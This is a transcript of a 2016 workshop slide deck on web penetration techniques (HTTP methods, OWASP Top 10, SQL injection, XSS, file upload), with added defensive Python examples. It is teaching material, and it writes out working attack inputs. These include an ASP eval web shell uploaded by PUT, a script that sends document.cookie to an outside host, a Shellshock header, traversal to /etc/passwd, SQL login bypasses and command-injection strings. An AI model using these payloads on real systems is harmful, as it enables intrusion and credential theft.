Web滲透技巧(上) (Web Penetration Techniques, Part 1)
Lionbug
October 01, 2016
Research
The Declaration of Hacker (TDOH) WorkShop
Transcript
Web滲透技巧(上) (Web Penetration Techniques, Part 1) 2016/10/01 @ TDOH WorkShop LionBug
About Me • 讙紣Ռ a.k.a. LionBug • Captain of TDOH • Co-founder of UCCU • Know a little • Web Security
HTTP Hypertext Transfer Protocol
HTTPS Hypertext Transfer Protocol Secure
How it works
Request & Response
HTTP Request
GET /index.php HTTP/1.1
Host: lionbug.tw
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9
Accept-Language: zh-TW,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Netcat or Telnet
Burp Suite
HTTP Request
HTTP GET Request: the same GET /index.php request as shown above (request line, Host, User-Agent, Accept, Accept-Language, Accept-Encoding, Connection).
HTTP POST Request
POST /login.php HTTP/1.1
…
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
(blank line)
username=admin&password=admin
HTTP Method • GET • POST • HEAD • OPTIONS • PUT • DELETE • TRACE • MOVE …
HTTP OPTIONS Request
OPTIONS / HTTP/1.1
HOST: lionbug.tw
HTTP OPTIONS Request SUCCESS
HTTP/1.1 200 OK
Allow: OPTIONS, TRACE, GET, HEAD, POST
Server: Microsoft-IIS/7.5
Public: OPTIONS, TRACE, GET, HEAD, POST
X-Powered-By: ASP.NET
HTTP OPTIONS Request Failed
HTTP/1.1 200 OK
Date: Thu, 29 Sep 2016 07:43:10 GMT
Server: Apache
HTTP PUT Request
PUT /shell.asp HTTP/1.1
HOST: lionbug.tw
Content-Length: 26
<%eval(request("cmd"))%>
HTTP PUT Request SUCCESS
HTTP/1.1 201 Created
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: http://lionbug.tw/shell.asp
HTTP PUT Request Failed
HTTP/1.1 404 Not Found
HTTP MOVE Request
MOVE /shell.txt HTTP/1.1
HOST: lionbug.tw
Destination: http://lionbug.tw/shell.asp
HTTP MOVE Request SUCCESS
HTTP/1.1 201 Created
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: http://lionbug.tw/shell.asp
HTTP MOVE Request Failed
HTTP/1.1 401 Unauthorized
WebDAV • MOVE shell.asp;.jpg • COPY shell.asp%00.jpg • NTFS permissions • Reference: a China Telecom system, WebDAV vulnerability leading to getshell
HTTP TRACE Request
TRACE /hello HTTP/1.1
HOST: lionbug.tw
Lion: bug
HTTP TRACE Request SUCCESS
HTTP/1.1 200 OK
…
TRACE /hello HTTP/1.1
HOST: lionbug.tw
Lion: bug
XST Cross-Site Tracing
HTTP TRACE Request
TRACE /<script>alert(1);<script> HTTP/1.1
HOST: lionbug.tw
HTTP TRACE Request SUCCESS
HTTP/1.1 200 OK
…
TRACE /<script>alert(1);<script> HTTP/1.1
HOST: lionbug.tw
HTTP TRACE Request • XST • Bypass httpOnly?
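Added example, not from the slides: a small audit helper that parses raw OPTIONS responses like the two shown above and lists the methods a public web server normally should not advertise (PUT, DELETE, MOVE, COPY, TRACE and the WebDAV probes). The sample responses are constructed for the example and modelled on the IIS and Apache replies on the slide; the method list and the third WebDAV sample are the author's assumptions.

```python
# Added example (not part of the original slides). Parses raw HTTP OPTIONS
# responses and flags methods a defender usually disables on a public server.
from typing import Dict, List, Set

# Methods that write to, move, or echo back to the client; TRACE enables XST.
RISKY_METHODS: Set[str] = {"PUT", "DELETE", "MOVE", "COPY", "TRACE", "PROPFIND", "MKCOL"}


def parse_response(raw: str) -> Dict[str, str]:
    """Split a raw HTTP response into a header map; the status line is stored under 'status'."""
    head = raw.replace("\r\n", "\n").split("\n\n", 1)[0]
    lines = head.split("\n")
    headers = {"status": lines[0].strip()}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return headers


def advertised_methods(raw: str) -> Set[str]:
    """Collect methods listed in Allow and in Public (IIS sends both, as on the slide)."""
    headers = parse_response(raw)
    methods: Set[str] = set()
    for key in ("allow", "public"):
        if key in headers:
            methods.update(m.strip().upper() for m in headers[key].split(",") if m.strip())
    return methods


def risky_methods(raw: str) -> List[str]:
    """Sorted list of advertised methods that are on the risky list."""
    return sorted(advertised_methods(raw) & RISKY_METHODS)


# Constructed sample modelled on the IIS 7.5 response on the slide.
IIS_OPTIONS = (
    "HTTP/1.1 200 OK\r\n"
    "Allow: OPTIONS, TRACE, GET, HEAD, POST\r\n"
    "Server: Microsoft-IIS/7.5\r\n"
    "Public: OPTIONS, TRACE, GET, HEAD, POST\r\n"
    "X-Powered-By: ASP.NET\r\n\r\n"
)
# Constructed sample modelled on the Apache response that lists no methods.
APACHE_OPTIONS = (
    "HTTP/1.1 200 OK\r\n"
    "Date: Thu, 29 Sep 2016 07:43:10 GMT\r\n"
    "Server: Apache\r\n\r\n"
)
# Constructed sample (assumption) of a server with WebDAV write methods enabled.
WEBDAV_OPTIONS = (
    "HTTP/1.1 200 OK\r\n"
    "Allow: OPTIONS, GET, HEAD, POST, PUT, DELETE, MOVE, COPY\r\n"
    "Server: Microsoft-IIS/6.0\r\n\r\n"
)

if __name__ == "__main__":
    for name, raw in (("iis", IIS_OPTIONS), ("apache", APACHE_OPTIONS), ("webdav", WEBDAV_OPTIONS)):
        print(name, risky_methods(raw))
```

On the IIS sample the only finding is TRACE, which is exactly the XST case the next slides cover; the fix on the server side is to disable TRACE (and any WebDAV write methods) rather than to rely on the Allow header being accurate.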
Try Bypass http://ctf.mis.nkfust.edu.tw/bypass01/
HTTP Request URI: the request line of the GET /index.php request shown above (GET /index.php HTTP/1.1); the URI is the /index.php part.
HTTP Request URI • /index.php • /upload/ • /blog/1 • /index.php/blog/1 • ../../../../../etc/passwd
Django Directory Traversal
Try Bypass http://ctf.mis.nkfust.edu.tw/bypass02/
HTTP Request Version: the version field of the request line shown above (HTTP/1.1 in GET /index.php HTTP/1.1).
HTTP Request Version • common versions • 1.0 • 1.1 • Host • Connection: Keep-Alive • 2.0 • "HTTP/2 protocol found to have 4 high-risk vulnerabilities that can crash servers" (Freebuf)
HTTP Request Header: the header lines of the GET /index.php request shown above (Host, User-Agent, Accept, Accept-Language, Accept-Encoding, Connection).
Requests HOST • Host: lionbug.tw • HTTP 1.1 • VirtualHost • …
Try Bypass http://ctf.mis.nkfust.edu.tw/bypass03/
Requests User-Agent • User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) • many sites decide what to show based on it • Shellshock (bash CVE-2014-6271) • () { :; }; ping -c 5 lionbug.tw • …
Requests Referer • Referer: http://lionbug.tw/index.php • …
Requests Accept family • Accept: text/html; • Accept-Language: zh-TW,zh; • Accept-Encoding: gzip, deflate • Accept-Ranges: bytes=0-1 • …
Requests Accept-Language • Accept-Language: zh-TW,zh; • …
Requests Accept-Ranges • Accept-Ranges: bytes=0-500 • Accept-Ranges: bytes=0-500,50-100 • CVE-2011-3192, CVE-2015-1635 (MS15-034) • … (note: in both CVEs the triggering header is the request header Range; Accept-Ranges is the response header a server uses to say it supports ranges)
Requests Cookie • Cookie: PHPSESSID=sess_3dd484f2bab6a2d2509e9850dae3b897; • …
Requests X-Forwarded-For • X-Forwarded-For: 127.0.0.1 • …
HTTP Response
HTTP Status Code
HTTP/1.1 200 OK
Date: Wed, 25 May 2016 11:48:22 GMT
Server: Apache
Content-Length: 72
Connection: close
Content-Type: text/html
HTTP Status Code • 1xx: request received, processing continues • 2xx: request successfully received, understood and accepted by the server • 3xx: redirection; the status code tells the client where to send the follow-up request • 4xx: the client appears to have made an error that prevents the server from handling the request • 5xx: the server hit an error or an abnormal state while handling the request
HTTP Status Code • 200 OK • 3xx • 301 Moved Permanently • 302 Found • 4xx • 401 Unauthorized • 403 Forbidden • 500 Internal Server Error
HTTP Response Header
HTTP/1.1 200 OK
Date: Wed, 25 May 2016 11:48:22 GMT
Server: Apache
Content-Length: 72
Connection: close
Content-Type: text/html
Response Server • Server: Apache/2.4.7 (Ubuntu) • Server: Microsoft-IIS/7.5 • …
Response X-Powered-By • X-Powered-By: Flask/0.7.2 • X-Powered-By: ASP.NET • X-Powered-By: PHP/5.5.9-1ubuntu4.19 • …
HTTP Response Content HTTP/1.1 200 OK … <html> </html>
Try to find http://ctf.mis.nkfust.edu.tw/bypass05/
OWASP TOP 10 2013
Unvalidated redirects and forwards • A10 - Unvalidated Redirects and Forwards • https://google.com/?redirect=http://lionbug.tw/ • https://google.com/?redirect=http%3A%2f%2flionbug.tw%2f
Unvalidated Redirects and Forwards https://bounty.github.com/classifications/unvalidated-redirect-or-forward.html
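Added example, not from the slides: a redirect-target check for the ?redirect= parameter above. It decodes the value once (so the percent-encoded form is judged the same as the plain one), allows only same-origin or explicitly allow-listed hosts, and falls back to "/" otherwise. The site host google.com is taken from the slide's URL; everything else is the author's assumption.

```python
# Added example (not part of the original slides): validating a redirect target.
from typing import FrozenSet
from urllib.parse import unquote, urlsplit


def safe_redirect(target: str, our_host: str = "google.com",
                  allowed_hosts: FrozenSet[str] = frozenset()) -> str:
    """Return target if it stays on our_host (or an allow-listed host), else '/'.

    Decodes once so that http%3A%2f%2flionbug.tw%2f and http://lionbug.tw/
    are judged identically. A framework that decodes the query string for you
    already hands over the decoded form, so this stays a single decode.
    """
    decoded = unquote(target)
    # Browsers normalise backslashes to slashes and strip some control
    # characters, so reject them instead of trying to reason about them.
    if any(ch in decoded for ch in "\\\r\n\t"):
        return "/"
    parts = urlsplit(decoded)
    # javascript:, data:, file: and friends are never valid redirect targets.
    if parts.scheme and parts.scheme.lower() not in ("http", "https"):
        return "/"
    if parts.netloc == "":
        # A relative path is fine as long as it is rooted at our site; urlsplit
        # already treats //host/ as a netloc, so that case does not reach here.
        return decoded if decoded.startswith("/") else "/"
    host = (parts.hostname or "").lower()
    # hostname ignores any user:pass@ prefix, so http://google.com@lionbug.tw/
    # is seen as lionbug.tw and rejected.
    if host == our_host or host in allowed_hosts:
        return decoded
    return "/"


if __name__ == "__main__":
    for value in ("http://lionbug.tw/", "http%3A%2f%2flionbug.tw%2f", "/account",
                  "https://google.com/maps", "//lionbug.tw/", "http://google.com@lionbug.tw/"):
        print(repr(value), "->", safe_redirect(value))
```

The allow-list is a frozenset of bare hostnames; prefix or suffix matching (google.com.lionbug.tw) is deliberately not used, since that is the usual way such checks are bypassed.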
Using components with known vulnerabilities • A9 - Using Components with Known Vulnerabilities • common vulnerable packages • FCKeditor, CKeditor • WordPress or Plugin • WPScan
Cross-site request forgery • A8 – Cross Site Request Forgery (CSRF) • add a token to the request • money transfer? password reset? • <img src="http://lionbug.tw/newpass?pass=123">
Missing function level access control • A7 – Missing Function Level Access Control • /admin/upload.php • .git .svn • index.php~ • robots.txt
robots.txt
# robots.txt to deny the robots access
User-agent: *
Disallow: /admin
Disallow: /admin.ex
Disallow: /config
robots.txt • fb.me/robots.txt • www.dcard.tw/robots.txt • tw.yahoo.com/robots.txt
Sensitive data exposure • A6 – Sensitive Data Exposure • passwords • MD5, SHA1, DES • transmitted in plaintext
Password stored in the cookie
LinkedIn credential leak http://thehackernews.com/2016/05/linkedin-account-hack.html
dadada http://www.nydailynews.com/news/national/mark-zuckerberg-twitter-account-hacked-password-dadada-article-1.2662351
My password has no encryption, Captain
EC-Council
EC-Council ?????????
Security misconfiguration • A5 – Security Misconfiguration • weak passwords? admin? root? 1234? • port • 3306 mysql • 6379 redis • 8081 tomcat • …
Insecure direct object references • A4 – Insecure Direct Object References • horizontal privilege • /?stuid=u9823001 • /cgpwd.php?username=admin&pass=1234 • /delete.php?id=123
Horizontal privilege vulnerability: Student A, Student B, Student C, Student D, Admin
Facebook Fixes Vulnerability That Led to Account Takeover, Pays Researcher $16K https://threatpost.com/facebook-fixes-vulnerability-that-led-to-account-takeover-pays-researcher-16k/120688/
Security Researcher Discovers Bug That Would Let Hackers Delete Any Photo Off Facebook https://techcrunch.com/2013/09/02/security-researcher-discovers-bug-that-would-let-hackers-delete-any-photo-off-facebook/
OpenFind Mail2000 arbitrary password reset
Editing the personal profile: a second mailbox must be set before the reset mail can be received
modify_id ??
Successfully reset the admin password https://zeroday.hitcon.org/vulnerability/ZD-2016-00031
Security misconfiguration • Directory Traversal • /download.php?file=123.pdf • /download.php?file=../../../../../etc/passwd • Local File Inclusion • /index.php?mod=news • <?php include($_GET['mod'].'php'); ?>
Security misconfiguration • Remote File Inclusion • /index.php?mod=http://lionbug.tw/shell.php • allow_url_fopen=On
WhatsApp LFI http://thehackernews.com/2013/06/Hacking-whatsapp-android-application.html
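Added example, not from the slides, serving both the URI traversal slide (../../../../../etc/passwd) and the download.php / include($_GET['mod']) slides above: a path check that resolves the user-supplied name under a fixed base directory and rejects anything that escapes it, plus an allow-list for the include case, where the client should never get to pick a path or a URL at all. The base directory and the module names are constructed for the example.

```python
# Added example (not part of the original slides): hardened replacements for the
# download.php?file= and index.php?mod= patterns.
import os
from typing import Optional

BASE_DIR = "/var/www/files"                   # hypothetical download root (assumption)
ALLOWED_MODULES = {"news", "blog", "about"}   # hypothetical include allow-list (assumption)


def safe_relative_path(base: str, user_path: str) -> Optional[str]:
    """Return user_path normalised relative to base, or None if it escapes base.

    realpath() collapses '..' segments and follows symlinks, so the decision is
    made on where the name really lands, not on its spelling. commonpath()
    compares whole path components, so /var/www/files2 is not 'inside'
    /var/www/files.
    """
    if "\x00" in user_path:                    # NUL-byte truncation tricks
        return None
    base_real = os.path.realpath(base)
    target = os.path.realpath(os.path.join(base_real, user_path))
    # An absolute user_path replaces base in os.path.join; realpath then
    # resolves it on its own and commonpath rejects it below.
    if os.path.commonpath([base_real, target]) != base_real:
        return None
    if target == base_real:                    # empty name or '.': not a file
        return None
    return os.path.relpath(target, base_real)


def include_module(mod: str) -> Optional[str]:
    """For include(): map a short name to a file only if it is on the allow-list.

    This closes both LFI (../../etc/passwd) and RFI (http://.../shell.php) at
    once, because no part of the client value ever becomes part of a path.
    """
    return f"{mod}.php" if mod in ALLOWED_MODULES else None


if __name__ == "__main__":
    for name in ("123.pdf", "../../../../../etc/passwd", "/etc/passwd", "a/../123.pdf"):
        print(repr(name), "->", safe_relative_path(BASE_DIR, name))
    for mod in ("news", "../../etc/passwd", "http://lionbug.tw/shell.php"):
        print(repr(mod), "->", include_module(mod))
```

Returning the relative name rather than the absolute one keeps the caller from accidentally logging or echoing the server's directory layout; the caller joins it with BASE_DIR again at the point of use.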
Cross-site scripting • A3 – Cross-Site Scripting (XSS) • attacks the client side? • injects malicious code into the front end • HTML, CSS, Javascript, Flash …
Cross-site scripting • reflected • http://lionbug.tw/xss.php?msg=<script>alert(1);</script> • stored • other • …
Sina Weibo: from one Flash XSS to an XSS worm https://www.leavesongs.com/HTML/sina-weibo-flashxss-worm.html
XSS steals the cookie
Cross-site scripting
<script>
var img = new Image();
img.src = 'http://lionbug.tw/' + document.cookie;
</script>
OpenFind Mail2000 Xss
• onclick becomes xonclick • script becomes scrips • html
Stripped ?? OpenFind Mail2000
<html></html><<html></html>s<html></html>c<html></html>r<html></html>i<html></html>p<html></html>t<html></html>><html></html>a<html></html>l<html></html>e<html></html>r<html></html>t<html></html>(<html></html>'<html></html>x<html></html>s<html></html>s<html></html>'<html></html>)<html></html>;<html></html><<html></html>/<html></html>s<html></html>c<html></html>r<html></html>i<html></html>p<html></html>t<html></html>> XSS Payload
OpenFind Mail2000 XSS
BeEF: be a tool guy
XSS can also get into the back end
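Added example, not from the slides: the two server-side controls that defeat the reflected xss.php?msg= case and the document.cookie stealer shown above, namely HTML-escaping the reflected value at output time and marking the session cookie HttpOnly. The page template and cookie attributes are the author's choices, not anything from the slides or from OpenFind.

```python
# Added example (not part of the original slides): output encoding for a
# reflected parameter and a Set-Cookie line the cookie stealer cannot read.
import html
from urllib.parse import parse_qs


def render_msg(query_string: str) -> str:
    """Body for xss.php?msg=... with the value escaped for an HTML text context.

    parse_qs percent-decodes the value (browsers send <, > and ; encoded);
    html.escape(quote=True) also covers ' and ", so the same helper is safe
    inside a double-quoted attribute value.
    """
    params = parse_qs(query_string, keep_blank_values=True)
    msg = params.get("msg", [""])[0]
    return f"<p>{html.escape(msg, quote=True)}</p>"


def session_cookie_header(session_id: str) -> str:
    """Set-Cookie for PHPSESSID with HttpOnly, so document.cookie never exposes it.

    Secure keeps it off plain HTTP; SameSite=Lax blunts the CSRF slide's
    <img src=...> trick for non-GET state changes.
    """
    return f"Set-Cookie: PHPSESSID={session_id}; Path=/; HttpOnly; Secure; SameSite=Lax"


def contains_script_tag(body: str) -> bool:
    """Helper for checks: is there still a raw <script tag in the rendered body?"""
    return "<script" in body.lower()


# Constructed request: the slide's alert(1) payload, percent-encoded as a browser sends it.
SAMPLE_QUERY = "msg=%3Cscript%3Ealert(1)%3B%3C%2Fscript%3E"

if __name__ == "__main__":
    print(render_msg(SAMPLE_QUERY))
    print(session_cookie_header("sess_constructed_example"))
```

Escaping is context-specific: the helper above is right for element text and quoted attributes, but a value placed inside a <script> block or a URL needs its own encoder, which is why frameworks auto-escape by context rather than with one function.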
Try to find http://ctf.mis.nkfust.edu.tw/bypass06
Broken authentication and session management • A2 – Broken Authentication and Session Management • Session and Cookie • Cookie • admin=0; • user=21232f297a57a5a743894a0e4a801fc3; (the MD5 of "admin") • HMAC ?? • …
Ruten vulnerability http://www.inside.com.tw/2015/08/21/ruten-security-issue
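Added example, not from the slides: what the "HMAC ??" bullet above points at. A cookie that carries admin=0 or user=md5("admin") in the clear can be rewritten by the client; appending an HMAC tag computed with a server-side key lets the server detect any change. The key, the session contents and the encoding (base64 JSON plus a hex tag) are the author's constructed choices for the example.

```python
# Added example (not part of the original slides): HMAC-signed cookie values.
import base64
import hashlib
import hmac
import json
from typing import Optional

SERVER_KEY = b"constructed-demo-key-replace-and-rotate"   # assumption: lives only on the server


def sign_cookie(data: dict) -> str:
    """Serialise data and append an HMAC-SHA256 tag: base64(json) + '.' + hex(tag)."""
    payload = base64.urlsafe_b64encode(json.dumps(data, sort_keys=True).encode()).decode()
    tag = hmac.new(SERVER_KEY, payload.encode(), hashlib.sha256).hexdigest()
    return f"{payload}.{tag}"


def verify_cookie(cookie: str) -> Optional[dict]:
    """Return the data if the tag matches, None if the cookie was altered or malformed."""
    try:
        payload, tag = cookie.rsplit(".", 1)
    except ValueError:
        return None
    expected = hmac.new(SERVER_KEY, payload.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, tag):   # constant-time comparison
        return None
    try:
        return json.loads(base64.urlsafe_b64decode(payload.encode()))
    except (ValueError, UnicodeDecodeError):
        return None


def tamper_demo() -> bool:
    """Flip admin 0 -> 1 in the payload while keeping the original tag; the server must reject it."""
    good = sign_cookie({"user": "lionbug", "admin": 0})
    _payload, tag = good.rsplit(".", 1)
    forged_payload = base64.urlsafe_b64encode(
        json.dumps({"user": "lionbug", "admin": 1}, sort_keys=True).encode()).decode()
    forged = f"{forged_payload}.{tag}"
    return verify_cookie(good) == {"user": "lionbug", "admin": 0} and verify_cookie(forged) is None


if __name__ == "__main__":
    print(sign_cookie({"user": "lionbug", "admin": 0}))
    print("tampering detected:", tamper_demo())
```

Signing gives integrity, not secrecy: the payload is readable by anyone holding the cookie, so a password (plain or hashed, as on the A6 slide) still does not belong in it. A server-side session store keyed by a random id is the simpler design; the signed cookie is the right tool when the server must stay stateless.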
Injection attacks • A1 – Injection • types of injection • SQL Injection • Code Injection • Command Injection • LDAP Injection • …
SQL Injection
Select username, password From Member Where username = 'admin' and password = '1234'
user.php?id=1
SELECT id, name, password From member Where id = 1
id  name     password
1   admin    asdxcx
2   lin      5657
3   jhe      123
4   lionbug  qwe
user.php?id=1 or 1=1
SELECT id, name, password From member Where id = 1 Or 1=1
(every row is returned)
id  name     password
1   admin    asdxcx
2   lin      5657
3   jhe      123
4   lionbug  qwe
Login
SELECT … Where name = 'admin' AND password = 'asdxcx'
(matches row 1, admin)
id  name     password
1   admin    asdxcx
2   lin      5657
3   jhe      123
4   lionbug  qwe
Login
SELECT … Where name = 'admin' or 1 = 1 -- '' AND password = ''
(the comment removes the password check; every row matches)
id  name     password
1   admin    asdxcx
2   lin      5657
3   jhe      123
4   lionbug  qwe
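Added example, not from the slides: the user.php?id= lookup and the login query above run against an in-memory SQLite copy of the slide's member table, once with the value pasted into the SQL text (the vulnerable form the slides illustrate) and once with bound parameters. The table contents come from the slide; the SQLite setup and function names are the author's.

```python
# Added example (not part of the original slides): string-built SQL beside
# parameterised SQL, on the slide's member table.
import sqlite3
from typing import List, Tuple

# Rows exactly as shown on the slide.
ROWS = [(1, "admin", "asdxcx"), (2, "lin", "5657"), (3, "jhe", "123"), (4, "lionbug", "qwe")]


def make_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE member (id INTEGER, name TEXT, password TEXT)")
    con.executemany("INSERT INTO member VALUES (?, ?, ?)", ROWS)
    return con


def lookup_vulnerable(con: sqlite3.Connection, user_id: str) -> List[Tuple]:
    """user.php?id=... as on the slide: the raw value becomes part of the SQL text."""
    return con.execute(f"SELECT id, name, password FROM member WHERE id = {user_id}").fetchall()


def lookup_safe(con: sqlite3.Connection, user_id: str) -> List[Tuple]:
    """Bound parameter: the driver hands SQLite a value, never a SQL fragment."""
    return con.execute("SELECT id, name, password FROM member WHERE id = ?", (user_id,)).fetchall()


def login_vulnerable(con: sqlite3.Connection, name: str, password: str) -> List[Tuple]:
    sql = f"SELECT id, name, password FROM member WHERE name = '{name}' AND password = '{password}'"
    return con.execute(sql).fetchall()


def login_safe(con: sqlite3.Connection, name: str, password: str) -> List[Tuple]:
    return con.execute(
        "SELECT id, name, password FROM member WHERE name = ? AND password = ?",
        (name, password)).fetchall()


def demo() -> dict:
    """Row counts for the slide's inputs against both versions of each query."""
    con = make_db()
    injected_name = "admin' or 1 = 1 -- "          # the login payload from the slide
    return {
        "vuln_lookup": len(lookup_vulnerable(con, "1 or 1=1")),
        "safe_lookup": len(lookup_safe(con, "1 or 1=1")),
        "vuln_login": len(login_vulnerable(con, injected_name, "")),
        "safe_login": len(login_safe(con, injected_name, "")),
        "real_login": len(login_safe(con, "admin", "asdxcx")),
    }


if __name__ == "__main__":
    print(demo())   # expected: vuln_* return 4 rows, safe_* return 0, real_login 1
```

In the safe variant the string "1 or 1=1" is compared as a value against the integer column and matches nothing; the only way to get row 1 back is to send the plain value "1". Parameter binding is the fix; escaping quotes by hand is not, because the numeric id case has no quotes to escape.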
Code Injection • code injection • PHP • eval($_GET['code']); • ASP • <%eval request("code")%>
Uber Remote Code Execution http://blog.orange.tw/2016/04/bug-bounty-uber-ubercom-remote-code_7.html
Command Injection • command injection • curl http://lionbug.tw • curl http://lionbug.tw; ls -al
Google Command injection http://www.pranav-venkat.com/2016/03/command-injection-which-got-me-6000.html
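Added example, not from the slides: the defensive side of the curl slide above. The URL is validated (http or https, a plain DNS host, no whitespace or shell metacharacters) and then passed to the process as one argv element rather than through a shell, so "http://lionbug.tw; ls -al" is refused and could not be interpreted as a second command even if it got through. The validation rules and the curl options are the author's choices.

```python
# Added example (not part of the original slides): building a curl invocation
# that cannot turn into a second command.
import re
import shlex
from typing import List
from urllib.parse import urlsplit

HOST_RE = re.compile(r"[A-Za-z0-9.-]+")           # plain DNS names only (assumption)
SHELL_META = set(";|&`$<>'\"\\()")                 # characters that mean something to sh


def is_safe_fetch_url(url: str) -> bool:
    """True only for http(s) URLs with a plain hostname and no shell-significant characters."""
    if any(ch.isspace() or ch in SHELL_META for ch in url):
        return False
    parts = urlsplit(url)
    if parts.scheme.lower() not in ("http", "https") or not parts.hostname:
        return False
    return HOST_RE.fullmatch(parts.hostname) is not None


def build_curl_argv(url: str) -> List[str]:
    """argv for subprocess.run(argv) with shell=False; '--' ends option parsing so
    a URL can never be read as a curl flag either."""
    if not is_safe_fetch_url(url):
        raise ValueError("refusing to fetch " + shlex.quote(url))
    return ["curl", "--silent", "--max-time", "10", "--", url]


if __name__ == "__main__":
    for candidate in ("http://lionbug.tw", "http://lionbug.tw; ls -al", "file:///etc/passwd"):
        try:
            print(candidate, "->", build_curl_argv(candidate))
        except ValueError as err:
            print(candidate, "->", err)
```

The argv list is the part that actually closes the hole; the character filter is defence in depth and keeps the rejected input out of log lines as well.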
Preparation • identify language, framework and system (wappalyzer) • directory scanning (dirb) • subdomains • subDomainsBrute • … • …
Common vulnerability exploitation • arbitrary file upload • LFI • SQL injection • …
Arbitrary file upload • validation methods • JS • FileName • Content-Type • Header
JS front-end validation
Arbitrary file upload • FileName • 123.jpg • 123.php%00.jpg • 123.jpg.php • 123.php?.jpg
Arbitrary file upload • Content-Type • image/jpeg • image/png • Header • ??
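Added example, not from the slides: an upload check that holds against the four filenames listed above. Only the last extension counts and must be on an allow-list, NUL bytes and path separators are rejected outright, the client's Content-Type must agree with that extension but is never trusted on its own, the leading bytes must match the type's magic, and the file is stored under a server-chosen name. The allowed types, magic signatures and sample bytes are constructed by the author.

```python
# Added example (not part of the original slides): validating an image upload.
import hashlib
import re
from typing import Optional

# Allowed extension -> magic bytes the file must start with (assumption: images only).
MAGIC = {"jpg": b"\xff\xd8\xff", "png": b"\x89PNG\r\n\x1a\n"}
# Client-declared Content-Type -> the extension it must agree with.
CONTENT_TYPES = {"image/jpeg": "jpg", "image/png": "png"}
# One dot, one extension, nothing exotic: 123.jpg.php and 123.php?.jpg fail here.
NAME_RE = re.compile(r"[A-Za-z0-9_-]+\.([A-Za-z0-9]+)")


def validate_upload(filename: str, content_type: str, data: bytes) -> Optional[str]:
    """Return the name to store the file under, or None if the upload is rejected."""
    # 123.php%00.jpg arrives either with a literal '%' (fails NAME_RE) or,
    # if the framework decoded it, with a NUL byte (rejected here).
    if "\x00" in filename or "/" in filename or "\\" in filename:
        return None
    match = NAME_RE.fullmatch(filename)
    if not match:
        return None
    ext = match.group(1).lower()
    if ext not in MAGIC:
        return None
    # Content-Type is chosen by the client (see the slide); it must be consistent
    # with the extension, but the bytes get the final say.
    if CONTENT_TYPES.get(content_type) != ext:
        return None
    if not data.startswith(MAGIC[ext]):
        return None
    # Never reuse the client's name on disk; derive one from the content.
    return f"{hashlib.sha256(data).hexdigest()[:16]}.{ext}"


# Constructed sample payloads: a minimal JPEG header and a PHP stub.
SAMPLE_JPEG = b"\xff\xd8\xff\xe0" + b"\x00" * 16
SAMPLE_PHP = b"<?php echo 'constructed'; ?>"

if __name__ == "__main__":
    for name in ("123.jpg", "123.php%00.jpg", "123.php\x00.jpg", "123.jpg.php", "123.php?.jpg"):
        print(repr(name), "->", validate_upload(name, "image/jpeg", SAMPLE_JPEG))
    print("php bytes as 123.jpg ->", validate_upload("123.jpg", "image/jpeg", SAMPLE_PHP))
```

Two server-side settings complete the picture and are outside this function: the upload directory must not be executable by the web server (no PHP or ASP handler mapped to it), and the stored file should be served with a fixed Content-Type rather than one sniffed from its contents.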
PHP Bug?? http://ctf.mis.nkfust.edu.tw/bypass07
Loose comparison with == (rows compared against columns; PHP 5 semantics, from which the slide's table is taken; in PHP 8 the number-to-string comparisons 0 == "php" and 0 == "" became FALSE)
==       TRUE   FALSE  1      0      -1     "1"    "0"    "-1"   NULL   array() "php"  ""
TRUE     TRUE   FALSE  TRUE   FALSE  TRUE   TRUE   FALSE  TRUE   FALSE  FALSE   TRUE   FALSE
FALSE    FALSE  TRUE   FALSE  TRUE   FALSE  FALSE  TRUE   FALSE  TRUE   TRUE    FALSE  TRUE
1        TRUE   FALSE  TRUE   FALSE  FALSE  TRUE   FALSE  FALSE  FALSE  FALSE   FALSE  FALSE
0        FALSE  TRUE   FALSE  TRUE   FALSE  FALSE  TRUE   FALSE  TRUE   FALSE   TRUE   TRUE
-1       TRUE   FALSE  FALSE  FALSE  TRUE   FALSE  FALSE  TRUE   FALSE  FALSE   FALSE  FALSE
"1"      TRUE   FALSE  TRUE   FALSE  FALSE  TRUE   FALSE  FALSE  FALSE  FALSE   FALSE  FALSE
"0"      FALSE  TRUE   FALSE  TRUE   FALSE  FALSE  TRUE   FALSE  FALSE  FALSE   FALSE  FALSE
"-1"     TRUE   FALSE  FALSE  FALSE  TRUE   FALSE  FALSE  TRUE   FALSE  FALSE   FALSE  FALSE
NULL     FALSE  TRUE   FALSE  TRUE   FALSE  FALSE  FALSE  FALSE  TRUE   TRUE    FALSE  TRUE
array()  FALSE  TRUE   FALSE  FALSE  FALSE  FALSE  FALSE  FALSE  TRUE   TRUE    FALSE  FALSE
"php"    TRUE   FALSE  FALSE  TRUE   FALSE  FALSE  FALSE  FALSE  FALSE  FALSE   TRUE   FALSE
""       FALSE  TRUE   FALSE  TRUE   FALSE  FALSE  FALSE  FALSE  TRUE   FALSE   FALSE  TRUE
Q & A